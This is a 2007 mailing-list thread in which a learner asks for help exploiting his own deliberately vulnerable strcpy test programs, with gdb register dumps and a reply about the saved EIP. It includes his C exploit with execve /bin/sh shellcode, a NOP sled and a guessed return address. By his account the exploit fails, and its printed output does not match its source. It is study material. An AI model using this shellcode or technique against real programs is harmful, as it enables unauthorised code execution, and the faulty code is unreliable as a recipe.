RE: stack overflow help ..



yes I read ..

if i write more 4 bytes ..it over writes teh *saved*
eip .. right ??


========= vul1.c ========
[root@winmitm ~]# more a1.c
f(char *str) {
char a[1024];
strcpy(a,str);
}
main(int argc,char *argv[1]) {
if(argc>1) f(argv[1]);
}

====== end of code ===


my exploit code which i wrote for this was ..

===== exploit1.c ======

#include <stdio.h>
#include <string.h>

#define lv_size 1024
#define offset 30+lv_size+8*4

long get_sp()
{
__asm__("movl %esp, %eax");
}

int main(int argc, char **argv)
{
char execshell[] =

"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"

"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"

"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

char buffer[lv_size+4*8];
unsigned long *ptr2 = NULL;
char *ptr = NULL;
int i;

printf("1..\n");
// Filling with null
for(i=0;i<lv_size+4*8;i++)
buffer[i]=0x00;
ptr=buffer;

printf("2..\n");
// Filling with NOPs
for(i=0;i<lv_size-strlen(execshell);i++)
*(ptr++)=0x90;

printf("3..\n");
// Filling with shellcode
for(i=0;i<strlen(execshell);i++)
*(ptr++)=execshell[i];

printf("4..\n");
// ptr2 pointing to ptr
ptr2=(long *)ptr;

printf("5..\n");
// Filling with address
for(i=1;i<2;i++)
*(ptr2++)=get_sp()+offset;

execl("/root/vul1", "vul1", buffer, NULL);

}

======== end of my exploit code =======

[root@winmitm ~]# cc expl1.c -o exploit
[root@winmitm ~]# ./exploit
1..
2..
3..
4..
5..
get_sp=bfffe568 and len=4
get_sp+offset=bfffe9a6 and len=4
6..
buffer:<&#65533;^^
3VV45V4N

&#65533;3&#65533;&#65533;/bin/sh&#65533;>
[root@winmitm ~]#

this is what i get ... can u please guide me on what i
am doing wrong ??

thanks
----gaurav
--- "Krpata, Tyler" <tkrpata@xxxxxxx> wrote:

Do an "info frame" in gdb. Remember that you are
trying, actually, to
overwrite the *saved* EIP value.


-----Original Message-----
From: listbounce@xxxxxxxxxxxxxxxxx
[mailto:listbounce@xxxxxxxxxxxxxxxxx]
On Behalf Of gaurav saha
Sent: Thursday, January 25, 2007 6:27 PM
To: security-basics@xxxxxxxxxxxxxxxxx
Subject: stack overflow help ..

Hi,
i am new to this stack overflow issue.

i am using fc3 (kernel 2.6.12-1.1381)

i have modified this few sysctl keys to these
values.

kernel.overflowgid = 0
kernel.overflowuid = 0
fs.overflowgid = 0
fs.overflowuid = 0
kernel.randomize_va_space = 0


i am still unable to overwrite EIP

========= vuln1.c ===========
int main(int argc, char **argv)
{
char buf[1024];
strcpy(buf, argv[1]);
return 0;
}
====== end of vuln1.c =======

$gcc -ggdb vuln1.c -o v1
$gdb ./v1
.
.
.
.
(gdb) run `perl -e 'print "A"x1024'`
Starting program:
/home/gaurav/test/challenges/challenges/buf/v1
`perl
-e 'print "A"x1024'`
Reading symbols from shared object read from
target
memory...(no debugging symbols found)...done.
Loaded system supplied DSO at 0xb5c000
(no debugging symbols found)...(no debugging
symbols
found)...
Program exited with code 0120.
(gdb) run `perl -e 'print "A"x1028'`
warning: cannot close "shared object read from
target
memory": File in wrong format
Starting program:
/home/gaurav/test/challenges/challenges/buf/v1
`perl
-e 'print "A"x1028'`
Reading symbols from shared object read from
target
memory...(no debugging symbols found)...done.
Loaded system supplied DSO at 0x247000
(no debugging symbols found)...(no debugging
symbols
found)...
Program exited with code 0100.
(gdb) run `perl -e 'print "A"x1036'`
warning: cannot close "shared object read from
target
memory": File in wrong format
Starting program:
/home/gaurav/test/challenges/challenges/buf/v1
`perl
-e 'print "A"x1036'`
Reading symbols from shared object read from
target
memory...(no debugging symbols found)...done.
Loaded system supplied DSO at 0x807000
(no debugging symbols found)...(no debugging
symbols
found)...
Program received signal SIGSEGV, Segmentation
fault.
0x00ac8e0d in __libc_start_main () from
/lib/tls/libc.so.6
(gdb) info reg
.
.
ebx 0xbdaff4 12431348
esp 0xbffff350 0xbffff350
ebp 0x41414141 0x41414141
esi 0xbffff3d4 -1073744940
edi 0xbffff360 -1073745056
eip 0xac8e0d 0xac8e0d
eflags 0x210286 2163334
.
.
(gdb) run `perl -e 'print "A"x1040'`
Program received signal SIGSEGV, Segmentation
fault.
0x080483a2 in main ()
(gdb) i r
ebp 0x41414141 0x41414141
eip 0x80483a2 0x80483a2
(gdb) run `perl -e 'print "A"x1044'`
Program received signal SIGSEGV, Segmentation
fault.
0x080483a2 in main ()
(gdb) i r
ebp 0x41414141 0x41414141
eip 0x80483a2 0x80483a2
(gdb) run `perl -e 'print "A"x1048'`
Program received signal SIGSEGV, Segmentation
fault.
0x080483a2 in main ()
(gdb) i r
ebp 0x41414141 0x41414141
eip 0x80483a2 0x80483a2
(gdb) run `perl -e 'print "A"x1052'`
Program received signal SIGSEGV, Segmentation
fault.
0x080483a2 in main ()
(gdb) i r
ebp 0x41414141 0x41414141
eip 0x80483a2 0x80483a2
(gdb) run `perl -e 'print "A"x1056'`
Program received signal SIGSEGV, Segmentation
fault.
0x080483a2 in main ()
(gdb) i r
ebp 0x41414141 0x41414141
eip 0x80483a2 0x80483a2

and this keeps continuing ... no matter how many i
increase ...
and i can't figure out what problem it is ...

thanks and adieu
----gaurav





________________________________________________________________________
__
__________
Now that's room service! Choose from over 150,000
hotels
in 45,000 destinations on Yahoo! Travel to find
your fit.
http://farechase.yahoo.com/promo-generic-14795097





____________________________________________________________________________________
Looking for earth-friendly autos?
Browse Top Cars by "Green Rating" at Yahoo! Autos' Green Center.
http://autos.yahoo.com/green_center/